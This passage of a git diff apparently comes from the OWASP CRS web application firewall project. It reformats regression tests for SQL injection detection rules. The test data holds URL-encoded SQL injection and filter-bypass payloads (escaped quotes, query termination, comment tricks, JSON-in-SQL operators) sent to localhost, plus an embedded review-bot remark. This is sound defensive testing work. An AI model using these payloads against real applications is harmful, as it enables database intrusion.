# \'or'1 + data: "var=%5C'or'1" + version: HTTP/1.0 + output: + log_contains: id "942522" + - test_id: 2 desc: "Blocks bypass with escaped quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # \"or"1 - data: "var=%5C%22or%221" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942522-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # \"or"1 + data: "var=%5C%22or%221" + version: HTTP/1.0 + output: + log_contains: id "942522" + - test_id: 3 desc: "Blocks bypass with escaped quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # \`or`1 - data: "var=%5C%60or%601" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942522-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # \`or`1 + data: "var=%5C%60or%601" + version: HTTP/1.0 + output: + log_contains: id "942522" + - test_id: 4 desc: "Blocks bypass with: \\'and" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%5C'and" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942522-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%5C'and" + version: HTTP/1.0 + output: + log_contains: id "942522" + - test_id: 5 desc: "Negative test: doesn't block normal SQLi" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='or'1" - version: HTTP/1.0 - output: - no_log_contains: id "942522" - - test_title: 942522-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='or'1" + version: HTTP/1.0 + output: + no_log_contains: id "942522" + - test_id: 6 desc: "Negative test: doesn't block escaped quotes without following (and|or)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%5C' foo or" - version: HTTP/1.0 - output: - no_log_contains: id "942522" - - test_title: 942522-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%5C' foo or" + version: HTTP/1.0 + output: + no_log_contains: id "942522" + - test_id: 7 desc: "New line bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=newline%0A%5C' and 1" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942522-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=newline%0A%5C' and 1" + version: HTTP/1.0 + output: + log_contains: id "942522" + - test_id: 8 desc: "Negative test: Wikipedia article about SQLi" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3
D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" - version: HTTP/1.0 - output: - no_log_contains: id "942522" - - test_title: 942522-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + 
uri: "/post" + data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3
D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" + version: HTTP/1.0 + output: + no_log_contains: id "942522" + - test_id: 9 desc: "Detect admin%40juice-sh.op'and%20likely%20(id)--" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 
"admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" - version: HTTP/1.0 - output: - log_contains: id "942522" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" + version: HTTP/1.0 + output: + log_contains: id "942522" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml index eb9af879b..728516d9a 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml @@ -2,23 +2,21 @@ meta: author: "Franziska Bühler, azurit" description: "Detects SQL query termination" - enabled: true - name: 942530.yaml +rule_id: 942530 tests: - - test_title: 942530-1 + - test_id: 1 desc: "Detects SQL query termination with ';" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin@juice-sh.op';&password=foo" - version: HTTP/1.0 - output: - log_contains: id "942530" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin@juice-sh.op';&password=foo" + version: HTTP/1.0 + output: + log_contains: id "942530" 
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml
index 97d543f83..0fce21551 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml
@@ -2,135 +2,127 @@ meta: author: "karelorigin, Walter Hop, azurit" description: Various Authentication bypass tests - enabled: true - name: 942540.yaml +rule_id: 942540 tests: - - test_title: 942540-1 + - test_id: 1 desc: "Positive test for single quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op';" - version: HTTP/1.0 - output: - log_contains: id "942540" - - test_title: 942540-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op';" + version: HTTP/1.0 + output: + log_contains: id "942540" + - test_id: 2 desc: "Positive test for double quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op\";" - version: HTTP/1.0 - output: - log_contains: id "942540" - - test_title: 942540-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op\";" + version: HTTP/1.0 + output: + log_contains: id "942540" + - test_id: 3 desc: "Positive test for backticks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op`;" - version: HTTP/1.0 - output: - log_contains: id "942540" - - test_title: 942540-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op`;" + version: HTTP/1.0 + output: + log_contains: id "942540" + - test_id: 4 desc: "False positive test CSV balanced single quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='foo';'bar';'def'" - version: HTTP/1.0 - output: - no_log_contains: id "942540" - - test_title: 942540-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='foo';'bar';'def'" + version: HTTP/1.0 + output: + no_log_contains: id "942540" + - test_id: 5 desc: "False positive test balanced backticks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=`foo`;`bar`;`def`" - version: HTTP/1.0 - output: - no_log_contains: id "942540" - - test_title: 942540-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=`foo`;`bar`;`def`" + version: HTTP/1.0 + output: + no_log_contains: id "942540" + - test_id: 6 desc: "False positive test (markdown) mixed and balanced quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Content-Type: "multipart/form-data; boundary=--------397236876" - method: POST - port: 80 - uri: "/post" - data: | - ----------397236876 - Content-Disposition: form-data; name="document"; filename="document.md" - Content-Type: text/markdown + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Content-Type: "multipart/form-data; boundary=--------397236876" + method: POST + port: 80 + uri: "/post" + data: | + ----------397236876 + Content-Disposition: form-data; name="document"; filename="document.md" + Content-Type: text/markdown - # Foo - my name is 'foo'; and I work on CRS. - # Bar - my name is "bar"; and I work on CRS. - ----------397236876-- - version: "HTTP/1.1" - output: - no_log_contains: id "942540" - - test_title: 942540-7 + # Foo + my name is 'foo'; and I work on CRS. + # Bar + my name is "bar"; and I work on CRS. 
+ ----------397236876-- + version: "HTTP/1.1" + output: + no_log_contains: id "942540" + - test_id: 7 desc: "Test for bypass with comment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=root%40example.com%27%2F%2A%20comment%20%2A%2F%3B" - version: HTTP/1.0 - output: - log_contains: id "942540" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=root%40example.com%27%2F%2A%20comment%20%2A%2F%3B" + version: HTTP/1.0 + output: + log_contains: id "942540" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml index f063ea0ed..32b9038b5 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml 
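Review bot: Test 6 is the only test in the file whose protocol version is quoted and is 1.1 (`version: "HTTP/1.1"`, every other test uses plain `version: HTTP/1.0`), and the hunk gives no reason for the difference; if 1.1 is required for the multipart request, a comment on that line would keep a later cleanup from "normalising" it, e.g. `# HTTP/1.1: multipart/form-data body with explicit boundary`, otherwise align it with the rest. A related caveat on the same test: the body is a `|` literal block, so the `----------397236876` delimiter lines are sent LF-terminated and with a trailing newline, whereas multipart/form-data delimiters are CRLF-terminated per RFC 2046; whether the harness or the target server tolerates LF is not visible here. It is worth confirming the request is actually parsed as multipart, because a false-positive test such as this one (`no_log_contains: id "942540"`) stays green for the wrong reason if the body is never inspected as form data.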
@@ -2,672 +2,635 @@ meta: author: "Andrea Menin (theMiddle), azurit" description: JSON in SQL bypass technique - enabled: true - name: 942550.yaml +rule_id: 942550 tests: - - test_title: 942550-1 + - test_id: 1 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 2 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 
+ uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 3 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 4 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: 
"/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 5 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 6 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: 
